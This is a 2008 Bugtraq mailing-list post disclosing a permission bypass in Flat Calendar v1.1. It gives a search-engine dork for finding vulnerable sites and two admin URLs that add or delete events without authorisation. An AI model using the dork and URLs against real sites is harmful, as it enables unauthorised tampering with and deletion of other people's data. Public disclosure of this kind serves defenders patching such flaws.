Bugtraq mailing list archives

Flat Calendar v1.1 Remote Permission Bypass Vulnerability


From: none () none com
Date: 11 Jun 2008 14:08:21 -0000

Flat Calendar v1.1  Remote Permission Bypass Vulnerability

Author : Crackers_Child

Dork   : Flat Calendar: View All > Flat Calendar: View All için yaklaşık 654.000 sonuçtan


Exploits:

site.com/calender_path/admin/add.php > Adding New Evetns without admin permissions.

site.com/calender_path/admin/deleteEvent.php?eventNumber=[EVENTNUMBERid] > Deleting Events without admin permissions.


Current thread: